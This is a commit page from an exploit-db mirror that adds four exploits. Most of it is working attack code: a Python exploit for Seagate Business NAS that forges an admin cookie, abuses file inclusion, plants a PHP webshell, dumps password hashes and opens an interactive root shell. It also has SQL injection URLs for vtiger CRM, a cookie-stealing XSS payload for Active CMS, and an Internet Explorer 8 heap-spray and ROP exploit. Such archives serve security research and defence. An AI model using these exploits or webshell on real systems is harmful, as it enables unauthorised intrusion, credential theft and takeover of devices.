bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-03-02

Browse source 
4 new exploits
This commit is contained in:
Offensive Security 2015-03-02 08:35:29 +00:00
parent d8b2f45cd4
commit 0853b7e8a4
5 changed files with 641 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
files.csv
View file

@ -32631,7 +32631,11 @@ id,file,description,date,author,platform,type,port
36199,platforms/linux/remote/36199.txt,"Perl 5.x Digest Module 'Digest->new()' Code Injection Vulnerability",2011-10-02,anonymous,linux,remote,0
36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 'referer' Header SQL Injection Vulnerability",2011-10-03,"Patroklos Argyroudis",php,webapps,0
36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 'admin/index.php' Cross-Site Scripting Vulnerability",2011-10-03,"Stefan Schurtz",php,webapps,0
36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS <= 2014.00319 - Pre-Authentication Remote Code Execution (0day)",2015-03-01,"OJ Reeves",hardware,webapps,80
36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 'mod' Parameter Cross Site Scripting Vulnerability",2011-10-06,"Stefan Schurtz",php,webapps,0

Can't render this file because it is too large.

330
platforms/hardware/webapps/36202.py Executable file
View file

@ -0,0 +1,330 @@
#!/usr/bin/env python
#
# Seagape
# =======
# Seagate Business NAS pre-authentication remote code execution
# exploit as root user.
#
# by OJ Reeves (@TheColonial) - for full details please see
# https://beyondbinary.io/advisory/seagate-nas-rce/
#
# Usage
# =====
# seagape.py <ip> <port> [-c [ua]]
#
# - ip : ip or host name of the target NAS
# - port : port of the admin web ui
# - -c : (optional) create a cookie which will give admin access.
# Not specifying this flag results in webshell installation.
# - ua : (optional) the user agent used by the browser for the
# admin session (UA must match the target browser).
# Default value is listed below
#
# Example
# =======
# Install and interact with the web shell:
# seagape.py 192.168.0.1 80
#
# Create admin cookie
# seagape.py 192.168.0.1 80 -c
import base64
import hashlib
import itertools
import os
import re
import socket
import sys
import urllib
import urllib2
import uuid
import xml.sax.saxutils
if len(sys.argv) < 3:
print "Usage: {0} <ip> <port> [-c [user agent]]".format(sys.argv[0])
sys.exit(1)
# Every Seagate nas has the same XOR key. Great.
XOR_KEY = '0f0a000d02011f0248000d290d0b0b0e03010e07'
# This is the User agent we'll use for most of the requests
DEFAULT_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'
# This is the description we're going to be reading from
LFI_FILE = '/etc/devicedesc'
# the base globals that will hold our state
host = sys.argv[1]
port = int(sys.argv[2])
cis = ''
hostname = ''
webshell = str(uuid.uuid1()) + ".php"
def chunks(s, n):
for i in xrange(0, len(s), n):
yield s[i:i + n]
def forward_interleave(a, b):
return ''.join(itertools.chain(*zip(itertools.cycle(a), b)))
def xor(s, k):
return ''.join(chr(ord(a) ^ ord(b)) for a, b in itertools.izip(s, itertools.cycle(k)))
def sha1(s):
return hashlib.sha1(s).hexdigest()
def decode(s):
f = xor(s, XOR_KEY)
return ''.join(chr(ord(a) ^ ord(b)) for a, b in chunks(f, 2))
def encode(s):
s = forward_interleave(sha1(s), s)
s = ''.join(a + chr(ord(a) ^ ord(b)) for a, b in chunks(s, 2))
return xor(s, XOR_KEY)
def make_request(uri = "/", ci_session = None, headers = None, post_data = None):
method = 'GET'
if not headers:
headers = {}
headers['Host'] = host
if 'User-Agent' not in headers:
headers['User-Agent'] = DEFAULT_UA
if 'Accept' not in headers:
headers['Accept'] = 'text/html'
if post_data:
method = 'POST'
post_data = urllib.urlencode(post_data)
headers['Content-Type'] = 'application/x-www-form-urlencoded'
if ci_session:
ci_session = urllib.quote(base64.b64encode(encode(ci_session)))
headers['Cookie'] = 'ci_session={0}'.format(ci_session)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
http = ""
http += "{0} {1} HTTP/1.1\r\n".format(method, uri)
for h in headers:
http += "{0}: {1}\r\n".format(h, headers[h])
if post_data:
http += "Content-Length: {0}\r\n".format(len(post_data))
http += "\r\n"
if post_data:
http += post_data
s.send(http)
result = ""
while True:
data = s.recv(1024)
if not data:
break
result += data
s.close()
return result
def get_ci_session():
resp = make_request()
for l in resp.split("\r\n"):
m = re.findall("Set-Cookie: ([a-zA-Z0-9_\-]+)=([a-zA-Z0-9\+%=/]+);", l)
for name, value in m:
if name == 'ci_session' and len(value) > 40:
return decode(base64.b64decode(urllib.unquote(value)))
print "Unable to establish session with {0}".format(host)
sys.exit(1)
def add_string(ci_session, key, value):
prefix = 's:{0}:"{1}";s:'.format(len(key), key)
if prefix in ci_session:
ci_session = re.sub(r'{0}\d+:"[^"]*"'.format(prefix), '{0}{1}:"{2}"'.format(prefix, len(value), value), ci_session)
else:
# doesn't exist, so we need to add it to the start and the end.
count = int(ci_session.split(':')[1]) + 1
ci_session = re.sub(r'a:\d+(.*)}$', r'a:{0}\1{1}{2}:"{3}";}}'.format(count, prefix, len(value), value), ci_session)
return ci_session
def set_admin(ci_session):
return add_string(ci_session, "is_admin", "yes")
def set_language(ci_session, lang):
return add_string(ci_session, "language", lang)
def include_file(ci_session, file_path):
if file_path[0] == '/':
file_path = '../../../../../..' + file_path
return set_language(ci_session, file_path + "\x00")
def read_file(file_path, post_data = None):
resp = make_request(ci_session = include_file(cis, file_path), headers = {}, post_data = post_data)
return resp
def hashdump():
shadow = read_file('/etc/shadow')
for l in shadow.split("\n"):
if l and ':!:' not in l and ':x:' not in l:
parts = l.split(':')
print "{0}:{1}".format(parts[0], parts[1])
def cmd(command):
headers = {
'Content-Type' : 'application/x-www-form-urlencoded',
'Accept' : '*/*',
'User-Agent' : DEFAULT_UA
}
post_data = urllib.urlencode({'c' : command})
headers['Content-Type'] = 'application/x-www-form-urlencoded'
ci_session = urllib.quote(base64.b64encode(encode(cis)))
headers['Cookie'] = 'ci_session={0}'.format(ci_session)
url = 'http://{0}:{1}/{2}'.format(host, port, webshell)
req = urllib2.Request(url, headers = headers, data = post_data)
return urllib2.urlopen(req).read()
def shell():
running = True
while running:
c = raw_input("Shell ({0}) $ ".format(post_id))
if c != 'quit' and c != 'exit':
cmd(c)
else:
running = False
def show_admin_cookie(user_agent):
ci_session = add_string(cis, 'is_admin', 'yes')
ci_session = add_string(ci_session, 'username', 'admin')
ci_session = add_string(ci_session, 'user_agent', user_agent)
ci_session = urllib.quote(base64.b64encode(encode(ci_session)))
print "Session cookies are bound to the browser's user agent."
print "Using user agent: " + user_agent
print "ci_session=" + ci_session
def show_version():
print "Firmware Version: {0}".format(get_firmware_version())
def show_cookie():
print cis
def show_help():
print ""
print "Seagape v1.0 -- Interactive Seagate NAS Webshell"
print " - OJ Reeves (@TheColonial) - https://beyondbinary.io/"
print " - https://beyondbinary.io/bbsec/001"
print "==========================================================================="
print "version - Print the current firmware version to screen."
print "dumpcookie - Print the current cookie to screen."
print "admincookie <ua> - Create an admin login cookie (ua == user agent string)."
print " Add to your browser and access ANY NAS box as admin."
print "help - Show this help."
print "exit / quit - Run for the hills."
print "<anything else> - Execute the command on the server."
print ""
def execute(user_input):
result = True
parts = user_input.split(' ')
c = parts[0]
if c == 'admincookie':
ua = DEFAULT_UA
if len(parts) > 1:
ua = ' '.join(parts[1:])
show_admin_cookie(ua)
elif c == 'dumpcookie':
show_cookie()
elif c == 'version':
show_version()
elif c == 'help':
show_help()
elif c == 'quit' or c == 'exit':
remove_shell()
result = False
else:
print cmd(user_input)
return result
def get_firmware_version():
resp = make_request("/index.php/mv_system/get_firmware?_=1413463189043",
ci_session = acis)
return resp.replace("\r", "").replace("\n", "").split("version")[1][1:-2]
def install_shell():
resp = make_request("/index.php/mv_system/get_general_setup?_=1413463189043",
ci_session = acis)
existing_setup = ''
for l in resp.split("\r\n"):
if 'general_setup' in l:
existing_setup = l
break
# generate the shell and its installer
exec_post = base64.b64encode("<?php if(isset($_POST['c'])&&!empty($_POST['c'])){system($_POST['c']);} ?>")
installer = '<?php file_put_contents(\'{0}\', base64_decode(\'{1}\')); ?>'.format(webshell, exec_post)
write_php = xml.sax.saxutils.quoteattr(installer)[1:-1]
start = existing_setup.index('" description="') + 15
end = existing_setup.index('"', start)
updated_setup = existing_setup[0:start] + write_php + existing_setup[end:]
# write the shell to the description
resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043",
ci_session = acis,
headers = { },
post_data = { 'general_setup' : updated_setup })
# invoke the installer
read_file(LFI_FILE)
# remove the installer
resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043",
ci_session = acis,
headers = { },
post_data = { 'general_setup' : existing_setup })
def remove_shell():
return cmd('rm -f {0}'.format(webshell))
print "Establishing session with {0} ...".format(host)
cis = get_ci_session()
if len(sys.argv) >= 4 and sys.argv[3] == '-c':
ua = DEFAULT_UA
if len(sys.argv) > 4:
ua = sys.argv[4]
show_admin_cookie(ua)
else:
print "Configuring administrative access ..."
acis = add_string(cis, 'is_admin', 'yes')
acis = add_string(acis, 'username', 'admin')
print "Installing web shell (takes a while) ..."
install_shell()
print "Extracting id and hostname ..."
identity = cmd('whoami').strip()
hostname = cmd('cat /etc/hostname').strip()
show_help()
running = True
while running:
try:
user_input = raw_input("Seagape ({0}@{1})> ".format(identity, hostname))
running = execute(user_input)
except:
print "Something went wrong. Try again."

15
platforms/php/webapps/36208.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/49948/info
vtiger CRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
vtiger CRM 5.2.1 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d1--
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d2--
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d5--
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4--

9
platforms/php/webapps/36213.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50001/info
Active CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Active CMS 1.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/activecms/admin/admin?action=module&mod=&#039;<script>alert(document.cookie)</script>

283
platforms/windows/remote/36209.html Executable file
View file

@ -0,0 +1,283 @@
source: http://www.securityfocus.com/bid/49964/info
Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability.
Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions.
<html>
<head>
</head>
<body>
<script type="text/javascript">
<!--
//originally, windows 7 compatible calc.exe shellcode from SkyLined
var scode = "removed";
var newstack,newstackaddr;
var fakeobj;
var spray,spray2,selarray,readindex,readaddr,optarryaddr;
var elms = new Array();
var optarray;
var mshtmlbase;
//option object that is to be corrupted
var corruptedoption;
var corruptedoptionaddr;
var corruptaddr;
function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
function inttostr(num) {
return String.fromCharCode(num%65536,Math.floor(num/65536));
}
function crash() {
var o = new Option();
selarray[99].options.add(o,-0x20000000);
}
function readmem(addr) {
if(addr < readaddr) alert("Error, can't read that address");
return strtoint(spray[readindex].substr((addr-readaddr)/2,2));
}
function readmem2(addr,size) {
if(addr < readaddr) alert("Error, can't read that address");
return spray[readindex].substr((addr-readaddr)/2,size/2);
}
function overwrite(addr) {
try {
var index = (addr-optarryaddr)/4 - 0x40000000;
selarray[99].options.add(optarray.pop(),index);
} catch(err) {}
}
function getreadaddr() {
readaddr = 0;
var indexarray = new Array();
var tmpaddr = 0;
var i,index;
index = readmem(tmpaddr);
indexarray.push(index);
while(1) {
tmpaddr += 0x100000;
index = readmem(tmpaddr);
for(i=0;i<indexarray.length;i++) {
if(indexarray[i]==index+1) {
readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24;
return 1;
} else if(indexarray[i]==index-1) {
readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24;
return 1;
}
}
indexarray.push(index);
}
}
//leverages the vulnerability into memory disclosure
function initread() {
//overwrite something in a heap spray slide
try {
selarray[99].options.add(optarray.pop(),-100000000/4);
} catch(err) {}
//now find what and where exectly did we overwrite
readindex = -1;
var i;
for(i=1;i<200;i++) {
if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2))
{
readindex = i;
break;
}
}
if(readindex == -1) {
alert("Error overwriring first spray");
return 0;
}
var start=2,len=spray[readindex].length-2,mid;
while(len>10) {
mid = Math.round(len/2);
mid = mid - mid%2;
if(spray[readindex].substr(start,mid) !=
spray[readindex-1].substr(start,mid)) {
len = mid;
} else {
start = start+mid;
len = len-mid;
//if(spray[readindex].substr(start,mid) ==
spray[readindex-1].substr(start,mid)) alert("error");
}
}
for(i=start;i<(start+20);i=i+2) {
if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) {
break;
}
}
//overwrite the string length
try {
selarray[99].options.add(optarray.pop(),-100000000/4-i/2-1);
} catch(err) {}
if(spray[readindex].length == spray[readindex-1].length) alert("error
overwriting string length");
//readaddr = strtoint(spray[readindex].substr((0x100000-4-0x20+4)/2,2))+0x24;
getreadaddr();
optarryaddr = readaddr + 100000000 + i*2;
return 1;
}
function trysploit() {
//create some helper objects
for(var i =0; i < 100; i++) {
elms.push(document.createElement('div'));
}
//force the option cache to rebuild itself
var tmp1 = selarray[99].options[70].text;
//overwrite the CTreeNode pointer
overwrite(corruptaddr);
//read the address of the option object we overwrited with
var optadr = readmem(corruptaddr);
//delete the option object...
selarray[99].options.remove(0);
CollectGarbage();
//...and allocate some strings in its place
for(var i = 0; i < elms.length; i++) {
elms[i].className = fakeobj;
}
//verify we overwrote the deleted option object successfully
if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0;
alert("success, calc.exe should start once you close this message box");
//now do something with the corrupted option object
corruptedoption.parentNode.click();
}
function hs() {
//first heap spray, nop slide + shellcode
spray = new Array(200);
var pattern = unescape("%u0C0C%u0C0C");
while(pattern.length<(0x100000/2)) pattern+=pattern;
pattern = pattern.substr(0,0x100000/2-0x100);
for(var i=0;i<200;i++) {
spray[i] = [inttostr(i)+pattern+scode].join("");
}
//fill small gaps, we wan everything _behind_ our heap spray so that
we can read it
var asmall = new Array(10000);
pattern = "aaaa";
while(pattern.length<500) pattern+=pattern;
for(var i=0;i<10000;i++) {
asmall[i]=[pattern+pattern].join("");
}
//create some select and option elements
selarray = new Array(100);
for(var i=0;i<100;i++) {
selarray[i] = document.createElement("select");
for(var j=0;j<100;j++) {
var o = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
selarray[i].options.add(o,0);
}
}
//create some extra option elements
optarray = new Array(10000);
for(var i=0;i<10000;i++) {
optarray[i] = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
}
//enable memory disclosure
if(initread()==0) return;
//force the option cache to rebuild itself
var tmp1 = selarray[99].options[60].text;
//get the address of some option element to be corrupted, also remove
it from its select element, we don't want anything else messing with
it
corruptedoptionaddr = readmem(optarryaddr+60*4);
corruptedoption = selarray[99].options[60];
selarray[99].options.remove(60);
//get the base address of mshtml.dll based on the vtable address
inside the option object
mshtmlbase = readmem(corruptedoptionaddr)-0xFC0C0;
alert("base address of mshtml.dll : " + mshtmlbase.toString(16));
//we'll overwrite the pointer to the CTreeNode object, compute its address
corruptaddr = corruptedoptionaddr+0x14;
//second heap-spray, this one will act as a stack (we'll exchange
stack pointer with a pointer into this)
spray2 = new Array(200);
//some address that is likely to be inside the "stack"
newstackaddr = optarryaddr+100000000;
newstackaddr-=newstackaddr%0x1000;
newstackaddr+=0x24;
//assemble the "stack" so that it calls VirtualProtect on the firs
shellcode and then jumps into it through return-oriented-programming
newstack = inttostr(newstackaddr+0x10)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(newstackaddr+0x14)+inttostr(mshtmlbase+0x14EF7)+inttostr(mshtmlbase+0x1348)+inttostr(mshtmlbase+0x801E8)+inttostr(readaddr+0x100000-0x24)+inttostr(0x100000)+inttostr(0x40)+inttostr(readaddr+0x1000)+inttostr(readaddr+0x101000)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(mshtmlbase+0x1B43F);
while(newstack.length<(0x1000/2))
newstack+=unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA");
newstack = newstack.substr(0,0x1000/2);
while(newstack.length<(0x100000/2)) newstack+=newstack;
newstack = newstack.substr(0,0x100000/2-0x100);
for(var i=0;i<200;i++) {
spray2[i] = [newstack].join("");
}
//constract a fake object which will replace a deleted option object
(it has to be the same size)
//fakeobj = unescape("%u4141%u4141")+inttostr(newstackaddr)+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
fakeobj = unescape("%u4141%u4141%u4141%u4141")+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
//loop until we either achieve command execution or fail
for(var i=0;i<100;i++) {
trysploit();
}
alert("Exploit failed, try again");
}
hs();
-->
</script>
</body>
</html>